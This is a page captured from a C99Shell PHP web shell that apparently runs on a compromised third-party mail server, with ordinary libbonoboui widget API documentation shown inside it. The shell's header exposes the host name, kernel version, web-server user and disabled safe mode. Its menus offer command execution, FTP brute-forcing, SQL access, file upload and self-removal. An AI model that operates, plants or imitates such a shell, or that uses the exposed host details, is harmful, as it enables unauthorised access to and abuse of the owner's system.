!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache/2.2.16 (Debian). PHP/5.3.3-7+squeeze19 

uname -a: Linux mail.tri-specialutilitydistrict.com 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC
2014 x86_64
 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/usr/share/doc/libbonoboui2-common/html/   drwxr-xr-x
Free 129.6 GB of 142.11 GB (91.19%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     libbonoboui-bonobo-selector-widget.html (11.55 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
bonobo-selector-widget

bonobo-selector-widget

bonobo-selector-widget

Description

Details

BonoboSelectorWidgetPrivate

typedef struct _BonoboSelectorWidgetPrivate BonoboSelectorWidgetPrivate;


BonoboSelectorWidget

typedef struct {
	GtkVBox parent;

	BonoboSelectorWidgetPrivate *priv;
} BonoboSelectorWidget;


BonoboSelectorWidgetClass

typedef struct {
	GtkVBoxClass parent_class;

	/* Virtual methods */
	gchar *(* get_id)          (BonoboSelectorWidget *sel);
	gchar *(* get_name)        (BonoboSelectorWidget *sel);
	gchar *(* get_description) (BonoboSelectorWidget *sel);
	void   (* set_interfaces)  (BonoboSelectorWidget *sel,
				    const gchar         **interfaces);

	/* User select */
	void   (* final_select)    (BonoboSelectorWidget *sel);

	gpointer dummy[2];
} BonoboSelectorWidgetClass;


bonobo_selector_widget_new ()

GtkWidget *         bonobo_selector_widget_new          (void);

Creates a new BonoboSelectorWidget widget, this contains a list and a description pane for each component.

Returns :

A pointer to the newly-created BonoboSelectorWidget widget.

bonobo_selector_widget_set_interfaces ()

void                bonobo_selector_widget_set_interfaces
                                                        (BonoboSelectorWidget *sel,
                                                         const gchar **interfaces_required);

sel :

interfaces_required :


bonobo_selector_widget_get_id ()

gchar *             bonobo_selector_widget_get_id       (BonoboSelectorWidget *sel);

sel :

A BonoboSelectorWidget widget.

Returns :

A newly-allocated string containing the ID of the currently-selected CORBA server (i.e., the corba server whose name is highlighted in the list). The user of this function is responsible for freeing this. It will give an oaf iid back.

bonobo_selector_widget_get_name ()

gchar *             bonobo_selector_widget_get_name     (BonoboSelectorWidget *sel);

sel :

A BonoboSelectorWidget widget.

Returns :

A newly-allocated string containing the name of the currently-selected CORBA server (i.e., the corba server whose name is highlighted in the list). The user of this function is responsible for freeing this.

bonobo_selector_widget_get_description ()

gchar *             bonobo_selector_widget_get_description
                                                        (BonoboSelectorWidget *sel);

sel :

A BonoboSelectorWidget widget.

Returns :

A newly-allocated string containing the description of the currently-selected CORBA server (i.e., the corba server whose name is highlighted in the list). The user of this function is responsible for freeing this.

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0094 ]--